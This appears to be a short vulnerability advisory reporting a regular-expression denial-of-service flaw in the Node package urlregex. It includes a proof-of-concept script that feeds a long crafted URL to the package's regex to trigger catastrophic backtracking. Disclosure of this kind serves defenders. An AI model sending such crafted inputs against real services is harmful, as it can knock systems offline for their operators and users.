Denial of Service in nescalante/urlregex

Valid

Reported on

Jun 24th 2020

Overview

urlregex

No-dependency URL validation for Node and the browser. This package is vulnerable to Regular Expression Denial of Service (ReDoS). An attacker providing a long string in String.test can cause a Denial of Service attack.

PoC

const urlRegex = require("urlregex");
const isValid = urlRegex().test(
  "http://huntr.devtestvulnerability2312321.testvulnerability2312321.testvulnerability2312321.testvulnerability2312321.testvulnerability2312321.testvulnerability2312321.testvulnerability2312321"
);
console.log(isValid);

Occurrences

index.js L10-L12

References

GitHub Issue

to join this conversation